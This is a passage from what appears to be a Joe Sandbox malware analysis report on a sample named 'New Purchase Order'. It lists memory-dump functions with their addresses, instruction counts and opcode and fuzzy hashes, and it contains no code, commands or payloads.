                                                          • Instruction ID: 9cf21a97e89a62abe2b466d80b2873dce48f1399bd39ae641bdd2a834f960773
                                                          • Opcode Fuzzy Hash: 628e777ab2220a9c51a5b8cab80ce92be43dc27714607dbb40feda941e3e7a2f
                                                          • Instruction Fuzzy Hash: EB110A72340A11BFE72255599C15F67F69ADBD4B60FA10128B758CB290DB60DC01C7A9
                                                          Function 01770946 Relevance: .1, Instructions: 70COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c154bd77400355ccdd1c78c903811ee8df484a2ae6f22207627d8ba1120b2f10
                                                          • Instruction ID: ae29fe64cc81e5793553ad860686106588f9c9687fe2792ed3cb399039ab4a73
                                                          • Opcode Fuzzy Hash: c154bd77400355ccdd1c78c903811ee8df484a2ae6f22207627d8ba1120b2f10
                                                          • Instruction Fuzzy Hash: 9621E6B1E01209AFCB24DFAAD8859AEFBF9FF99710F10012FE505A7244DA709941CF54
                                                          Function 017880A8 Relevance: .1, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction ID: b4401fee842cacc9c81980ae0ad0b894154a800bdc7cf74e81bd7fea8a74c95b
                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                          • Instruction Fuzzy Hash: 7E218172940209EFDF129F58CC44B9EFBBAEF48310F244459F951A7251D734DD519B50
                                                          Function 01720124 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction ID: ac592a2a9d37418ad6f120849fb3ba7afe86c70d42aabcf3623c8920d4dbf6bd
                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                          • Instruction Fuzzy Hash: 7D11DD72601619AFE7229B48CC85F9EFBB8EB80754F200029FA008B190D671ED46CB60
                                                          Function 016F8770 Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aac05c67d6e01965d2edb3c5f8ea043bf647e900f3cff5ee065a1cc9f0ede3b7
                                                          • Instruction ID: 717f220e58743670910841a85802ddb9aced403027c3b2ef02dd771ac7e4f59d
                                                          • Opcode Fuzzy Hash: aac05c67d6e01965d2edb3c5f8ea043bf647e900f3cff5ee065a1cc9f0ede3b7
                                                          • Instruction Fuzzy Hash: 0E11BF767016119BDB11CF4DC880A6ABBEEAF5A710B1980ADEF089F304D7B2D9018790
                                                          Function 0172AAEE Relevance: .1, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                          • Instruction ID: c4d570996b4e5a28429d270592a634cc5852cddfb033474fe2bf5a152cb58106
                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                          • Instruction Fuzzy Hash: 8A217972640661DFDB228F4DC544A66FBE6EB94B10F14887DE94A8BA14C730EC02CF80
                                                          Function 016F80E9 Relevance: .1, Instructions: 66COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f08c40637159c69a71cf215c5b4bcf9724fac13ac2019300e14a3f04653235a
                                                          • Instruction ID: 8a2ece53ba62552ef080552bf8ad62ffccabe0da9f8a374812cf0f9e4d5332ea
                                                          • Opcode Fuzzy Hash: 1f08c40637159c69a71cf215c5b4bcf9724fac13ac2019300e14a3f04653235a
                                                          • Instruction Fuzzy Hash: D9216F75A00206DFCB14CF58C981A6EBBF9FB89319F2442ADD205AB355C771AD06CBD0
                                                          Function 0172674D Relevance: .1, Instructions: 65COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58273a6c8f8caafc16f464808c10e2831e0495d0ba8d11ca3b174f89a1c4489b
                                                          • Instruction ID: e4957997f4cd0a7ef600f2d8f800648ce2ff9a3fb82a5b66f8593c664d7a5361
                                                          • Opcode Fuzzy Hash: 58273a6c8f8caafc16f464808c10e2831e0495d0ba8d11ca3b174f89a1c4489b
                                                          • Instruction Fuzzy Hash: 58218E71500A10EFD7218F69D840B66F7E8FF44250F00882EF99AC7251DA70EC41CB60
                                                          Function 01786870 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ec5328fe09e8fed54206c49034adc070c5349afa3b4881a75200ec3256d48088
                                                          • Instruction ID: 1501b078a06a43934fa7f13fc1c63530a44e73a3d388e6101b30a9f094b0297e
                                                          • Opcode Fuzzy Hash: ec5328fe09e8fed54206c49034adc070c5349afa3b4881a75200ec3256d48088
                                                          • Instruction Fuzzy Hash: C7119132280614FFC722EB5DCD44F9AF7A8EB99A64F114069F215DB291DA70E901C7A1
                                                          Function 0171E8C0 Relevance: .1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d6aed35a9066d017d919724e0ff8d375bbe148eb0acfc8c420203379ef8c11b
                                                          • Instruction ID: 5a67fdb02c0e261380047d2b0ba0af6bfa672647a410697a3b138ec3326f4e93
                                                          • Opcode Fuzzy Hash: 9d6aed35a9066d017d919724e0ff8d375bbe148eb0acfc8c420203379ef8c11b
                                                          • Instruction Fuzzy Hash: 611108333041149FCB1ADB29CC89A6BF29BEBD5374B354539EE22CB294ED309842C291
                                                          Function 017266B0 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0dbf5ea2bd8645de759e717354a5bbbfb8f1d7c56b486a78ea1ce4e5c364b71e
                                                          • Instruction ID: 51ce743f27dfbd686f45891719cf1ab7b630ffc28c5b7110c8f29bee41379c64
                                                          • Opcode Fuzzy Hash: 0dbf5ea2bd8645de759e717354a5bbbfb8f1d7c56b486a78ea1ce4e5c364b71e
                                                          • Instruction Fuzzy Hash: D1110172A00221DFCB26CF59E480A0AFBF4EF98210F0180BAFD059B351E630DC01CB90
                                                          Function 017BA8E4 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction ID: b0e44cb98a93bbdfbf224df8bd6da515a35e33b83c378c620ef60df65745898e
                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                          • Instruction Fuzzy Hash: 69110436A00905AFDB19DB58C845B9DFBF5FF84210F058269E85597344E731EE41CBC0
                                                          Function 016F0AD0 Relevance: .1, Instructions: 61COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                          • Instruction ID: 425186f19c3c71601f28ba08f7a4d41f458c550fc46d453be410a1e23486cf83
                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                          • Instruction Fuzzy Hash: B921F4B5A00B099FD3A0CF29C540B52BBF4FB48B10F10492EE98AC7B40E371E814CB90
                                                          Function 0177E7E1 Relevance: .1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction ID: e48dc77164f0501b108b68e057f714461ae1628dcbc1945275e0d1c09a9532c2
                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                          • Instruction Fuzzy Hash: CA11AC32680601EFEF219F48C844B5AFBE6EF45754F0594ACEA499B261DF31EC80DB90
                                                          Function 017127ED Relevance: .1, Instructions: 58COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 86046126436f945975d6fc558c4d8be6c1453f837bdba70de7ccb119c57aabe3
                                                          • Instruction ID: 68b11444c4512be6b9ab593fff1c45063f6f1b28d51c217a45a581f70bbc3e43
                                                          • Opcode Fuzzy Hash: 86046126436f945975d6fc558c4d8be6c1453f837bdba70de7ccb119c57aabe3
                                                          • Instruction Fuzzy Hash: 32010471645645AFE316A26DD848F27EBDCEF50350F1500B5FD008B295E964DC00C261
                                                          Function 016F4690 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2eeb6f811274df8c8ac2a83729fa2be3f183d581788449738c31f56324b32aad
                                                          • Instruction ID: 15b73e062bc854ba705244901fd37e3e2ffe0c531c36dd3dd2be9600cb9dab5e
                                                          • Opcode Fuzzy Hash: 2eeb6f811274df8c8ac2a83729fa2be3f183d581788449738c31f56324b32aad
                                                          • Instruction Fuzzy Hash: 23119A36204645AFDB25CF59DC44B677BA9EB9AB64F00411EFA048BB50CB71E840CFA0
                                                          Function 017C4B00 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c5d29c2260429b0e175e854bc537eecd1882fbbb7229286dc84c877074f1cbb7
                                                          • Instruction ID: c5e55c084b209bf979299d7b76099fc257fb170debfe447327a47738e1645e42
                                                          • Opcode Fuzzy Hash: c5d29c2260429b0e175e854bc537eecd1882fbbb7229286dc84c877074f1cbb7
                                                          • Instruction Fuzzy Hash: 6211C236200A119FD7229E6DD854F66FBE6FFC4B20F19442DEA43C7694DA30E802CB90
                                                          Function 01726620 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 24f162d2c7a79d903aa6f9dd7bdb23fd071bca30f775a6498afcdf0bb3030fb2
                                                          • Instruction ID: bc3a122dad3b98d0f8d79bb7af0e73f581f4f2449bfcb495e3db1b24e0596356
                                                          • Opcode Fuzzy Hash: 24f162d2c7a79d903aa6f9dd7bdb23fd071bca30f775a6498afcdf0bb3030fb2
                                                          • Instruction Fuzzy Hash: BE117076A01726ABDB329F59C980B5EFBB9EF48750F54045AEE01A7244D730AD028B90
                                                          Function 0171EA2E Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ab31be1780f1efd08e14577e3f1aa7168fce53dd72bb51f0cc4e0c72c3bfa461
                                                          • Instruction ID: a05b8b295b53485b35993af7a9418738bdf966858816e5cf8f9bf466c56cdcec
                                                          • Opcode Fuzzy Hash: ab31be1780f1efd08e14577e3f1aa7168fce53dd72bb51f0cc4e0c72c3bfa461
                                                          • Instruction Fuzzy Hash: 8801967550010A9FC726DB19D448F26FBFAFB95328F218169E6058B265CB70DD81CB94
                                                          Function 0171E53E Relevance: .1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                          • Instruction ID: 3dc170c8b866e913292f008b77e5927f9ce464b91e5a14403b752948f6ca317d
                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                          • Instruction Fuzzy Hash: 9811E571601AC2DFE723972CC948F25FBE4AB01744F2900E0DE41C7686FB78C942C251
                                                          Function 0177E75D Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                          • Instruction ID: 6fc17c2dbe9da7ecbe3adb1a880777ae0f852cf41d75a56af5d3ae567ca75cbe
                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                          • Instruction Fuzzy Hash: 8A018032600205AFEB219B58CC04B6AFAA9EB45760F0584A8EA059B260EB71DD80CBD0
                                                          Function 016EA250 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                          • Instruction ID: 82b57385b99ac56f624a37d5794bedf420346ec1c13125f65623dcd50c0b5ba7
                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                          • Instruction Fuzzy Hash: 860104314067219FCB218F599C44A227BE4EF55760704C72DF895AF281C331D801CB60
                                                          Function 017C4940 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 762e3d13b4933f6429e7048ec9c459ca038bcb0c21499378e433a2e6f44d98a8
                                                          • Instruction ID: 9779278eedd3ce6c5e37c05a2c216eb845740f20f085500cda6989f25a25d9ef
                                                          • Opcode Fuzzy Hash: 762e3d13b4933f6429e7048ec9c459ca038bcb0c21499378e433a2e6f44d98a8
                                                          • Instruction Fuzzy Hash: 210100335416219FC3329F1C8814E92F7E8EB91B70B25426DE9AA9B2E6D730D801CB90
                                                          Function 0176E1D0 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4290acdff930817e8b8390140087b2fecdeb840e91113cf6d4794ca976e55a00
                                                          • Instruction ID: 00842a4b5599330fbdb650fd5f0adf6d9a400009879a002bb3f0ce690f50c640
                                                          • Opcode Fuzzy Hash: 4290acdff930817e8b8390140087b2fecdeb840e91113cf6d4794ca976e55a00
                                                          • Instruction Fuzzy Hash: 3E11ED36241601EFCB16EF09CD90F06BBB9FF58B44F2000A9FE059B2A1C631ED01CAA0
                                                          Function 016F6259 Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9f9c03f346e01352e37b6dbfd71a3f21ef648246eecb28f8b8eaedaae6df1ea
                                                          • Instruction ID: 7303087696daf186ea1de1b8174954722281b507db5d3bff1820bd21509b5aaa
                                                          • Opcode Fuzzy Hash: c9f9c03f346e01352e37b6dbfd71a3f21ef648246eecb28f8b8eaedaae6df1ea
                                                          • Instruction Fuzzy Hash: 96118E71541229ABEB39EF64CD46FE9B3B4BF48710F5081D4A318A61E1DB709E81CF84
                                                          Function 01776050 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d01c4dee061b47e5a7d75060d980d579363479f49e626b7b470d4c4547139eee
                                                          • Instruction ID: 5cb04f6f4aae3b7bbfec91bb6ad352e88655c284949a0e4cc75dc9f6a924c621
                                                          • Opcode Fuzzy Hash: d01c4dee061b47e5a7d75060d980d579363479f49e626b7b470d4c4547139eee
                                                          • Instruction Fuzzy Hash: 6E11177290011DABCB12DB94CC84EDFBBBCEF48258F044166E906A7215EA34AA55CBE0
                                                          Function 016F208A Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                          • Instruction ID: cf51c8c76593399d7aaebded8b20f6c04f67264f2f826c3b6259a4559d4ecd4c
                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                          • Instruction Fuzzy Hash: 0001F1336002118BEF128A6DDC94A92B767BFC4700F5944ADEE018F24AEB71C881CBA0
                                                          Function 01786500 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7f8dc458b546a2b4b5a40c0b097d2ac5402763946c57339ed549c425f02201e4
                                                          • Instruction ID: 95c555a7d00679b948b7a28ecc04688abba4bf11fa731d197704ac0340735cb4
                                                          • Opcode Fuzzy Hash: 7f8dc458b546a2b4b5a40c0b097d2ac5402763946c57339ed549c425f02201e4
                                                          • Instruction Fuzzy Hash: 3511CE72680146AFC301DF18C800BA2FBB9FB5A314F188159F8488F315D732EC80CBA0
                                                          Function 0177C810 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 62426985485627824a1d154272bfe066d4a23001fee177fcfbe71d5f69da1db3
                                                          • Instruction ID: c3df5d7571a2cb68d1737505a729620398a0abd8f0e2d991c7306b4c207b3b58
                                                          • Opcode Fuzzy Hash: 62426985485627824a1d154272bfe066d4a23001fee177fcfbe71d5f69da1db3
                                                          • Instruction Fuzzy Hash: 271118B1A0020A9FCB04DFA9D545AAEFBF8FF58350F10806AA905E7355D674EA018BA4
                                                          Function 0179EA60 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7aec370200f92b7d5582dc272b5ce7759d555599536dc93cf933c0ded4e9280a
                                                          • Instruction ID: 68d374996f26dfa1e7bd7268fb28096e73885acf783f9e887a2208b7a792a106
                                                          • Opcode Fuzzy Hash: 7aec370200f92b7d5582dc272b5ce7759d555599536dc93cf933c0ded4e9280a
                                                          • Instruction Fuzzy Hash: 4301F132140211DBCF33EA199448937FBE9FF51660B1444AAE1114B2A1CF259D81CB90
                                                          Function 016EC020 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                          • Instruction ID: 8f01e35dca873ccdcb896ea8dd1d7b067949513be0365738c77812fa8b01e231
                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                          • Instruction Fuzzy Hash: 4501D8321007059FEB32D6A9C908EA7FBE9FFE5610F14891DE5968B644DF71E442CBA0
                                                          Function 017320F0 Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a56122078f0d8bb8ea41ae3314fca57ba455d0c5b681fd6fa0a307b409ec2d6
                                                          • Instruction ID: e9a8d6e965c1ea4100f937bd84cc8f896a2f4abd13236ca8c9208e33c65a78e4
                                                          • Opcode Fuzzy Hash: 5a56122078f0d8bb8ea41ae3314fca57ba455d0c5b681fd6fa0a307b409ec2d6
                                                          • Instruction Fuzzy Hash: 47116D35A0020DEFCB05DF64C955EAEBBB9EB88240F004099E9029B295E635EE11CB90
                                                          Function 0172E5CF Relevance: .0, Instructions: 49COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1802567314.00000000016C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016C0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_16c0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4eef3610b46cbe7c29929c014358bfca2f393ebd7e3b2b4b56e2870eec359022
                                                          • Instruction ID: a32730fed1b4c572c80d7cc9a6ac2a60e001aef1348787ee2ac4ac104cf38dbe
